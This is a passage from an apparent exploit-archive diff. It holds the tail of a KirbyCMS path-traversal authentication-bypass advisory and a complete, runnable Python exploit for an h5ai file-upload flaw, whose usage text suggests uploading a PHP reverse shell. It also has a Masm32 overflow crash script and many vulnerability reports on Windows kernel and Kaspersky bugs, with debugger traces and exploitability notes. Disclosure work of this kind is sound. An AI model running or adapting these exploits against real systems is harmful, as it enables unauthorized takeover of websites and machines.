/sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php
As a result, the attacker will get the following response:
<h2 class="hgroup hgroup-single-line cf">
<span class="hgroup-title">
<a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a>
</span>
<span class="hgroup-options shiv shiv-dark shiv-left">
getting access to the KirbyCMS control panel with admin rights.
VI. BUSINESS IMPACT
-------------------------
Users who make use of vulnerable versions of KirbyCMS in shared hosting
environments are at risk of having their website modified by unauthorized users.
An attacker who manages to log in as an administrator will be able to change
all the existing content as well as upload new files.
This attack could be combined with the: 'CSRF Content Upload and PHP Script
Execution' vulnerability, also discovered by Dawid Golunski and described in a
separate document.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.
To exploit the vulnerability an attacker must be able to write a malicious
credentials file on the system in a public directory that is accessible by the
victim KirbyCMS site. This is a common situation on many hosting environments
that allow to write/read files from temporary directories such as /tmp,
/var/tmp etc.
Such file could potentially also be uploaded by other means, even if
the attacker does not have an account on the same server, such as anonymous FTP
, an email attachment which gets saved in a tmp file on the server etc.
VIII. SOLUTION
-------------------------
Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-Path-Traversal-Authentication-Bypass-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
14.09.2015 - Final
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

161
platforms/php/webapps/38256.py Executable file
View file

@ -0,0 +1,161 @@
#!/usr/bin/env python
# Exploit Title: h5ai < 0.25.0 Unrestricted File Upload
# Date: 21 September 2015
# Exploit Author: rTheory
# Vendor Homepage: https://larsjung.de/h5ai/
# Vulnerable Software Link: https://web.archive.org/web/20140208063613/http://release.larsjung.de/h5ai/h5ai-0.24.0.zip
# Vulnerable Versions: 0.22.0 - 0.24.1
# Tested on: 0.24.0 running on Apache
# CVE : 2015-3203
import urllib
import urllib2
import socket
import os
import getopt
import sys
# Globals with default options
url = ''
path = '/'
fileName = ''
filePath = ''
verboseMode = False
def header():
print '+-----------------------------------------------+'
print '| File upload exploit for h5ai v0.22.0 - 0.24.1 |'
print '| See CVE-2015-3203 for vulnerability details |'
print '+------------------- rTheory -------------------+'
def usage():
print
print 'Usage: %s -t target_url -f upload_file' % os.path.basename(__file__)
print '-t --target - The URL to connect to'
print ' ex: http://example.com'
print '-f --file - The file to upload'
print ' ex: php-reverse-shell.php'
print '-p --path - The path to upload to'
print ' Default is \'/\''
print '-v --verbose - Enable more verbose output'
print
print 'Examples:'
print '%s -t http://example.com:8080 -f php-reverse-shell.php' % os.path.basename(__file__)
print '%s -t http://192.168.1.100 -f php-reverse-shell.php -p /dir/' % os.path.basename(__file__)
sys.exit(0)
def main():
global url
global path
global fileName
global filePath
global verboseMode
header()
if not len(sys.argv[4:]):
print '[-] Incorrect number of arguments'
usage()
try:
opts, args = getopt.getopt(sys.argv[1:],"ht:f:p:v", ["help","target","file","path","verbose"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ('-h','--help'):
usage()
elif o in ('-t','--target'):
url = a
elif o in ('-f','--file'):
fileName = a
elif o in ('-p','--path'):
path = a
elif o in ('-v','--verbose'):
verboseMode = True
else:
assert False,"Unhandled Option"
# Test target URL, target file, and path inputs for validity
if not url.startswith('http'):
print '[-] Error: Target URL must start with http:// or https://'
usage()
if not os.path.isfile(fileName):
print '[-] Error: File does not appear to exist'
usage()
if not (path.startswith('/') and path.endswith('/')):
print '[-] Error: Path must start and end with a \'/\''
usage()
# Determine target host, which is the URL minus the leading protocol
if url.find('http://') != -1:
host = url[7:]
elif url.find('https://') != -1:
host = url[8:]
else:
host = url
# Store the contents of the upload file into a string
print '[+] Reading upload file'
f = open(fileName,'r')
fileContents = f.read()
f.close()
MPFB = 'multipartformboundary1442784669030' # constant string used for MIME info
# Header information. Content-Length not needed.
http_header = {
"Host" : host,
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language" : "en-us,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Content-type" : "multipart/form-data; boundary=------" + MPFB,
"X-Requested-With" : "XMLHttpRequest",
"Referer" : url + path,
"Connection" : "keep-alive"
}
# POST parameter for file upload
payload = '--------'+MPFB+'\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n'
payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="href"\r\n\r\n'+path+'\r\n'
payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="userfile"; filename="'+fileName+'"\r\nContent-Type: \r\n\r\n'+fileContents+'\r\n'
payload += '--------'+MPFB+'--\r\n'
socket.setdefaulttimeout(5)
opener = urllib2.build_opener()
req = urllib2.Request(url, payload, http_header)
# submit request and print output. Expected: "code 0"
try:
print '[+] Sending exploit POST request'
res = opener.open(req)
html = res.read()
if verboseMode: print '[+] Server returned: ' + html
except:
print '[-] Socket timed out, but it might still have worked...'
# close the connection
opener.close()
# Last step: check to see if the file uploaded (performed outside of this function)
filePath = url + path + fileName
print '[+] Checking to see if the file uploaded:'
print '[+] ' + filePath
def postCheck():
# Check to see if the file exists
# This may work now that everything from main() was torn down
global filePath
try:
urllib2.urlopen(filePath)
print '[+] File uploaded successfully!'
except urllib2.HTTPError, e:
print '[-] File did not appear to upload'
except urllib2.URLError, e:
print '[-] File did not appear to upload'
main()
postCheck()

13
platforms/win32/dos/38265.txt Executable file
View file

@ -0,0 +1,13 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=311
Bitmap object Use-after-Free #2
The attached PoC triggers a blue screen due to a use after free vulnerability. The crashes are unreliable, however you can use Special Pool in order to get reliable crashes. The crashes indicate that it is possible to write to arbitrary addresses.
---
please find the PoC and brief analysis for the issue attached. The analysis mentions how Special Pool can be used to get very reliable crashes, it should crash without Special Pool after a while as well.
--
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38265.zip

7
platforms/win32/dos/38266.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=339
The attached PoC demonstrate a use-after-free condition that occurs when operating on a DeferWindowPos object from multiple threads. The DeferWindowPos() call will trigger and block on the execution of a window procedure in a separate thread from which we call EndDeferWindowPos on the same handle. specialpool.txt contains the debugger output with Session Pool enabled, crash.txt the debugger output without Session Pool.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38266.zip

6
platforms/win32/dos/38267.txt Executable file
View file

@ -0,0 +1,6 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=335
Freed memory is accessed after switching between two desktops of which one is closed. The testcase crashes with and without special pool enabled. The attached crash output is with special enabled on win32k.sys and ntoskrnl.sys.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38267.zip

6
platforms/win32/dos/38268.txt Executable file
View file

@ -0,0 +1,6 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=321
The PoC triggers a crashes due to a pool buffer overflow while drawing the caption bar of window. The trigger depends on the current window layout and resolution. The PoC takes an offset on the command line to be able to test with different values, I tested this on two different Win7 32-bit VM's and had success with 0 and 475000 (Resolution was 1024x768 and 1280x1024). A bruteforce Python script is also attached which should trigger a crash fairly quickly.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38268.zip

6
platforms/win32/dos/38269.txt Executable file
View file

@ -0,0 +1,6 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=320
The PoC bug checks reliably with Special Pool enabled on writing to freed memory. A reference to the freed memory is held at offset +0x10 of the THREADINFO object. This memory is referenced in HmgAllocateObjectAttr which is called in multiple locations. The freed memory is a struct inside a Brush Object which is freed in the call NtGdiDeleteObjectApp.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38269.zip

6
platforms/win32/dos/38270.txt Executable file
View file

@ -0,0 +1,6 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=313
The PoC triggers a pool buffer overflow in win32k!vSolidFillRect. When using Special Pool we get the crash immediately on the overwrite. Without Special Pool we often get a crash in the same function, but sometimes it crashes in a different function (similar to another issue, however with a different offset). This might be a result of the memory corruption or an out-of-memory condition before the overflow is triggered. Debugger output for all three different crashes attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38270.zip

7
platforms/win32/dos/38271.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=312
This issue is very likely a null pointer issue affecting 32-bit Windows version. The offset is from add onto another offset which isn't quite zero, so not 100% convinced it is just a null pointer, however I wasn't able to influence the values. because it was very straight forward to get EIP there is a PoC setting EIP to 0xdeadbeef
Debug output attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38271.zip

11
platforms/win32/dos/38273.txt Executable file
View file

@ -0,0 +1,11 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=295
Platform: Win7 32-bit.
trigger.cpp should fire the issue, with caveats:
- PoC MUST be compiled in release mode.
- PoC may need to be run a few times to trigger the crash.
Analysis is attached as a text file.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38273.zip

23
platforms/win32/dos/38274.txt Executable file
View file

@ -0,0 +1,23 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=294
Platform: Win7 32-bit.
trigger.cpp should fire the issue, with a caveat
- PoC might NOT work if compiled as a debug build.
windbg.txt is a sample crash log.
Analysis from Nils:
---
please find attached a C trigger, windbg output and the minimised testcase of a null pointer issue (exploitable on Win 7 32-bit). The trigger also demonstrates that the null page can be mapped in user mode and accessed from kernel mode.
Quick analysis:
The trigger creates a new window station which is freed during the process clean up. Through the clipboard operations the window's last reference is hold by the clipboard which is freed during the clean up of the window station object. This will also result in destroying the window object at a time where _gptiCurrent (threadinfo) is already set to null. This is used in xxxDestroyWindow in multiple locations. Depending on the window type it is potentially possible to trigger different kinds of crashes, this one demonstrates a write to a chosen memory location:
win32k!HMChangeOwnerThread+0x40:
96979765 ff412c inc dword ptr [ecx+2Ch] ds:0023:bebebeea=????????
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38274.zip

19
platforms/win32/dos/38275.txt Executable file
View file

@ -0,0 +1,19 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=293
Platform: Win7 32-bit.
trigger.cpp should fire the issue, with two caveats:
- PoC will NOT work if compiled as a debug build.
- PoC will trigger the condition every time but the subsequent corruption might not cause a crash every time. It may be necessary to run the PoC multiple times.
debug.txt is a sample crash log.
Analysis from Nils:
---
Using the series of calls we are able to free the bitmap object, a reference to this object still exists in the trigger process after killing the first notepad process.
At this time we are able to replace the freed object in memory. We are not able to reuse this object through the original handle, however another free is triggered when quitting the trigger process, which will decrement the reference counter on the freed or replaced object, either modifying heap metadata or freeing the object which was allocated in the place of the original bitmap object.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38275.zip

8
platforms/win32/dos/38276.txt Executable file
View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=475
---
The attached PoC triggers a wild write on Win 7 32-bit with Special Pool enabled on win32k.sys.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38276.zip

8
platforms/win32/dos/38277.txt Executable file
View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=458
---
The attached testcase crashes Win 7 with Special Pool on win32k while accessing freed memory in bGetRealizedBrush.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38277.zip

7
platforms/win32/dos/38278.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=457
---
The attached testcase crashes Win 7 with Special Pool enabled while accessing the freed global cursor object (_gpqCursor). See poc.cpp for instructions on how to compile and run.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38278.zip

8
platforms/win32/dos/38279.txt Executable file
View file

@ -0,0 +1,8 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=433
---
The attached PoC demonstrates a UAF condition with printer device contexts. The PoC will trigger on Win 7 32-bit with Special Pool enabled.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38279.zip

10
platforms/win32/dos/38280.txt Executable file
View file

@ -0,0 +1,10 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=415
---
Tested on Win 7 32-bit with Special Pool enabled.
Multiple pool buffer overflows can be triggered through the NtGdiStretchBlt system call. The attached PoC demonstrates a write overflow and another read over flow issue which is likely to be usable for memory leaks (enabled by uncommenting the first NtGdiStretchBlt call).
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38280.zip

18
platforms/windows/dos/38259.py Executable file
View file

@ -0,0 +1,18 @@
# EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Date of Testing: 22nd September 2015
# Download Link : http://www.masm32.com/masmdl.htm
# Tested On : Windows 10
# Steps to Crash :-
# Step 1: Execute this python script
# Step 2: This script will create a file called MASM_crash.txt
# Step 3: Now open Masm32's QUICK EDITOR
# Step 4: Go to Script > 'Convert Text to Script'
# Step 5: Open the MASM_crash.txt to convert
# Step 6: That should crash the program .
file = open('MASM_crash.txt' , 'w');
buffer = "A"*4676 + "B"*4 + "C"*4 + "D"*500
file.write(buffer);
file.close()

6
platforms/windows/dos/38272.txt Executable file
View file

@ -0,0 +1,6 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=304
Creating a device context with the flag (DCX_NORESETATTRS) and selecting a brush object into the device context will result in the brush being freed on process exit without the reference to the object being cleared. The PoC consists of two files (prime304.cpp and poc304.cpp). poc304 will execute prime304, which triggers the issue and allows poc304 to retrieve a handle to the device context with the pointer to the freed object. We can confirm this by requesting the handle for the brush object from the device context, resulting in reading freed memory. In some cases the issue leads to memory corruption when for example another object is allocated into the space of the free brush object (see attached crash logs for examples).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38272.zip

70
platforms/windows/dos/38281.txt Executable file
View file

@ -0,0 +1,70 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=522
Fuzzing VB6 executables produced the attached crash testcase:
(5a8.dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=0a07e8ec ecx=0a07eb04 edx=00000000 esi=0907e924 edi=00000010
eip=13d64b78 esp=0ea6ee30 ebp=0ea6ee38 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
13d64b78 0fb60e movzx ecx,byte ptr [esi] ds:002b:0907e924=??
# where does esi come from?
0:121> ub @eip La
13d64b60 55 push ebp
13d64b61 8bec mov ebp,esp
13d64b63 8b4514 mov eax,dword ptr [ebp+14h]
13d64b66 57 push edi
13d64b67 8b7d0c mov edi,dword ptr [ebp+0Ch]
13d64b6a f7d0 not eax
13d64b6c 85ff test edi,edi
13d64b6e 0f849e000000 je 13d64c12
13d64b74 56 push esi
13d64b75 8b7510 mov esi,dword ptr [ebp+10h]
# Okay, it's a parameter
0:121> kvn1
# ChildEBP RetAddr Args to Child
00 0ea6ee38 14424d8f 1656cae4 00000010 0907e924 0x13d64b78
0:121> ub 14424d8f La
14424d77 8b4304 mov eax,dword ptr [ebx+4] <-- load index
14424d7a 03c3 add eax,ebx <-- add to pointer
14424d7c 8d4c3bf0 lea ecx,[ebx+edi-10h] <-- probably load bounds of buffer
14424d80 3bc1 cmp eax,ecx <-- check if index is in bounds
14424d82 771f ja 14424da3 <-- too late, overflow has already happened
14424d84 6a00 push 0
14424d86 50 push eax < +0x10
14424d87 6a10 push 10h
14424d89 56 push esi
14424d8a e8d1fd93ff call 13d64b60
Looks like the code is doing
ptr += offset;
if (ptr > ptr+SizeOfBuffer)
goto error;
This is obviously incorrect, because the offset can wrap. Where does that value come from?
0:121> dd ebx
0a07e8ec 00000228 ff000038 000000d0 000000f8
0a07e8fc 0000014f 00000120 00000158 000001bc
0a07e90c 00000048 00000000 00000204 00000211
0a07e91c 38000208 00000000 02a69b00 101b081b
0a07e92c 00083389 5a4f2f2b 02a69b02 101b081b
0a07e93c 00083389 5a4f2f2b 09194000 11cfdf6e
0a07e94c a000748e f8260fc9 bac300ac 4551fc30
0a07e95c 204f1db8 383f2a55 77696e7e 4df2a25e
That is from the input file:
*0001e10: 2802 0000 3800 00ff d000 0000 f800 0000 (...8...........
0001e20: 4f01 0000 2001 0000 5801 0000 bc01 0000 O... ...X.......
0001e30: 4800 0000 0000 0000 0402 0000 1102 0000 H...............
0001e40: 0802 0038 0000 0000 009b a602 1b08 1b10 ...8............
0001e50: 8933 0800 2b2f 4f5a 029b a602 1b08 1b10 .3..+/OZ........
0001e60: 8933 0800 2b2f 4f5a 0040 1909 6edf cf11 .3..+/OZ.@..n...
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38281.zip

73
platforms/windows/dos/38282.txt Executable file
View file

@ -0,0 +1,73 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=525
Fuzzing packed executables found the attached crash, it might be usable as an information leak as part of another bug, so filing as a low-risk bug. If I had to guess, I would say this is the ExeCryptor unpacker.
(83c.fc0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0b61f00c ebx=00030ff4 ecx=00000000 edx=00000000 esi=0409005c edi=00000000
eip=15cc7e73 esp=0441ecf8 ebp=0441ef18 iopl=0 nv up ei pl nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010217
15cc7e73 803c03e9 cmp byte ptr [ebx+eax],0E9h ds:002b:0b650000=??
What is that code doing?
0:021> u
15cc7e73 803c03e9 cmp byte ptr [ebx+eax],0E9h
15cc7e77 0f8596000000 jne 15cc7f13
15cc7e7d 8b540301 mov edx,dword ptr [ebx+eax+1]
15cc7e81 8d441a05 lea eax,[edx+ebx+5]
15cc7e85 33c9 xor ecx,ecx
15cc7e87 3d00100000 cmp eax,1000h
15cc7e8c 0f9cc1 setl cl
15cc7e8f 33d2 xor edx,edx
That edx+ebx+5 gives it away, it's searching for a jmp opcode and trying to pull out the branch target.
Why did it get lost? I'll put a breakpoint there and see where it goes wrong:
0:021> bp @eip
0:021> .restart
Breakpoint 0 hit
eax=0584f00c ebx=00000000 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7e73 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000282
15cc7e73 803c03e9 cmp byte ptr [ebx+eax],0E9h ds:002b:0584f00c=00
That looks fine, eax is the start of the buffer to search, and ebx is the index to look for a jmp opcode.
0:024> t
eax=0584f00c ebx=00000000 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7e77 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei pl nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000217
15cc7e77 0f8596000000 jne 15cc7f13 [br=1]
0:024> t
eax=0584f00c ebx=00000000 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7f13 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei pl nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000217
15cc7f13 43 inc ebx
0:024> t
eax=0584f00c ebx=00000001 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7f14 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000203
15cc7f14 8d47fb lea eax,[edi-5]
0:024> t
eax=fffffffb ebx=00000001 ecx=0497eb4c edx=00000000 esi=05a1005c edi=00000000
eip=15cc7f17 esp=0497ebc4 ebp=0497ede4 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000203
15cc7f17 3bd8 cmp ebx,eax
Ah, that's the bug, it's wrapping past zero and never exiting. The code is probably doing:
do {
if (ptr[index] != JMP_OPCODE)
index -= SIZEOF_JMP;
} while (index != 0);
That's a bug, because if index < SIZEOF_JMP, it will wrap and never exit. I would think it should decrement by 1 not sizeof(jmp) anyway, because jmps do not have to be aligned, but I don't know anything about ExeCryptor - maybe it makes sense.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38282.zip

54
platforms/windows/dos/38283.txt Executable file
View file

@ -0,0 +1,54 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=526
Fuzzing of packed executables found the attached crash.
0:022> g
(83c.bbc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000027 edi=0432005c
eip=15de0bd2 esp=0bb4ee04 ebp=0bb4ee20 iopl=0 ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06
15de0bd2 8a843700040000 mov al,byte ptr [edi+esi+400h] ds:002b:84320483=??
If I step through that address calculation:
0:022> p
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000022 edi=0432005c
eip=15de0d3a esp=0bb4ee04 ebp=0bb4ee20 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
15de0d3a 03f0 add esi,eax
0:022> p
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000027 edi=0432005c
eip=15de0d3c esp=0bb4ee04 ebp=0bb4ee20 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000286
15de0d3c 3b75f0 cmp esi,dword ptr [ebp-10h] ss:002b:0bb4ee10=000003f1
0:022> p
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000027 edi=0432005c
eip=15de0d3f esp=0bb4ee04 ebp=0bb4ee20 iopl=0 ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000a06
15de0d3f 0f8c8dfeffff jl 15de0bd2 [br=1]
0:022> p
eax=00000005 ebx=04320481 ecx=7ffffffd edx=f50139ce esi=80000027 edi=0432005c
eip=15de0bd2 esp=0bb4ee04 ebp=0bb4ee20 iopl=0 ov up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000a06
15de0bd2 8a843700040000 mov al,byte ptr [edi+esi+400h] ds:002b:84320483=??
This looks like an integer overflow:
int base;
int index;
if (base + index > argMaxSize)
goto error;
Because it's a signed comparison, 7ffffffd + 5 is
0:022> ? ecx + eax
Evaluate expression: -2147483646
Which is less than 0x3f1, the size parameter. Those values are directly from the executable being scanned.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38283.zip

43
platforms/windows/dos/38284.txt Executable file
View file

@ -0,0 +1,43 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=519
Fuzzing the DEX file format found a crash that loads a function pointer from an attacker controlled pointer, on Windows this results in a call to an unmapped address. This is obviously exploitable for remote, zero-interaction code execution as NT AUTHORITY\SYSTEM on any system with Kaspersky Antivirus. I've tested Windows, Linux, Mac and a product using the Kaspersky SDK (ZoneAlarm Pro), all were exploitable.
(5dc.990): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=9c000000 ebx=00000000 ecx=053ef3ec edx=00020009 esi=04130d40 edi=800000d8
eip=9c000000 esp=053eec14 ebp=053eec74 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
9c000000 ?? ???
0:026> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
053eec10 1740927e 04137af0 04137ac8 04130d40 0x9c000000
053eecb8 70118a64 04130d40 00000002 04130d40 0x1740927e
053eecd0 70116a1c 04130d40 0000234c 00000001 kavbase_kdl!KLAV_Engine_Create+0x17a62
053eed80 70113829 04130d40 0500234c 00000000 kavbase_kdl!KLAV_Engine_Create+0x15a1a
053eedc0 70117156 04130d40 107407b4 00000001 kavbase_kdl!KLAV_Engine_Create+0x12827
053eee6c 70113926 04130d40 20000001 00000000 kavbase_kdl!KLAV_Engine_Create+0x16154
053eee94 701167f2 04130d40 000001e3 053eeed4 kavbase_kdl!KLAV_Engine_Create+0x12924
053eeea4 70112c28 04130d40 00000067 0e5100a2 kavbase_kdl!KLAV_Engine_Create+0x157f0
053eeed4 70112cef 053eeee0 04130d40 16d30ae0 kavbase_kdl!KLAV_Engine_Create+0x11c26
0:026> .frame /c 1
01 053eecb8 70118a64 0x1740927e
eax=9c000000 ebx=00000000 ecx=053ef3ec edx=00020009 esi=04130d40 edi=800000d8
eip=1740927e esp=053eec18 ebp=053eec74 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
1740927e 83c404 add esp,4
0:026> ub
17409269 8b45fc mov eax,dword ptr [ebp-4]
1740926c 85c0 test eax,eax
1740926e 7411 je 17409281
17409270 c745fc00000000 mov dword ptr [ebp-4],0
17409277 8b10 mov edx,dword ptr [eax]
17409279 50 push eax
1740927a 8b02 mov eax,dword ptr [edx] <-- corrupt attacker controlled pointer
1740927c ffd0 call eax <-- attacker gains control of execution
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38284.zip

61
platforms/windows/dos/38285.txt Executable file
View file

@ -0,0 +1,61 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=524
Fuzzing CHM files with Kaspersky Antivirus produced the attached crash.
(83c.fec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0bd3e470 ebx=00000ef1 ecx=00000000 edx=0b002fb0 esi=00000018 edi=0bd3e473
eip=15edb522 esp=0bd3e234 ebp=0bd3e240 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
15edb522 8a12 mov dl,byte ptr [edx] ds:002b:0b002fb0=??
Where does edx come from?
0:085> uf 15edb4f0
15edb4f0 55 push ebp
...
15edb520 8b10 mov edx,dword ptr [eax]
15edb522 8a12 mov dl,byte ptr [edx]
15edb524 8817 mov byte ptr [edi],dl
15edb526 ff00 inc dword ptr [eax]
15edb528 47 inc edi
15edb529 83c6ff add esi,0FFFFFFFFh
15edb52c 83d1ff adc ecx,0FFFFFFFFh
15edb52f 8bd6 mov edx,esi
15edb531 0bd1 or edx,ecx
15edb533 75eb jne 15edb520
...
Edx is a parameter, and this is a simple memcpy loop.
for (i = ArgSize; i > 0; i--) {
*argDestPtr++ = *argSrcPtr++;
}
But why is the input pointer corrupt, that should be a pointer to the input buffer (i.e. the CHM being scanned)?
0:018> kvn1
# ChildEBP RetAddr Args to Child
00 03f4e1c0 15edb73b 0000022f 00000000 0afda8d4 0x15edb522
0:018> ub 15edb73b
15edb725 3bc1 cmp eax,ecx
15edb727 774f ja 15edb778
15edb729 52 push edx
15edb72a 50 push eax
15edb72b 8d95e8fdffff lea edx,[ebp-218h] <-- destination buffer
15edb731 8bcb mov ecx,ebx
15edb733 8d45fc lea eax,[ebp-4]
15edb736 e8b5fdffff call 15edb4f0
Ah, the destination is a fixed size stack buffer (I'm guessing 512 bytes), so if the size read from the input is greater than 512 (in this case it's 0x22f), the stack will be corrupted.
The input pointer is corrupt because the loop overwrites the src pointer with attacker controlled input and then it crashes trying to read from it. That can obviously be fixed by an attacker, so this is an exploitable stack buffer overflow.
It seems likely /GS would have made this unexploitable.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38285.zip

33
platforms/windows/dos/38286.txt Executable file
View file

@ -0,0 +1,33 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=527
While fuzzing UPX packed files, this crash was discovered resulting in an arbitrary stack-relative write. This vulnerability is obviously remotely exploitable for remote code execution as NT AUTHORITY\SYSTEM.
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000001 ecx=f93900c7 edx=00000020 esi=00000001 edi=057b9d60
eip=15ea22da esp=0497eb2c ebp=0497ec80 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
15ea22da 01840dbcfeffff add dword ptr [ebp+ecx-144h],eax ss:002b:fdd0ec03=????????
This decoding loop is trying to modify a value in a stack buffer with an attacker controlled index.
The index and Those values are taken verbatim from the input:
50 BC C7 00 39 F9 0F B6 47 FB F7 D8 01 04 24 39
C7 83 EF F1 8D 7F F2 80 7F FB 0A 89 E4 8B C9 8D
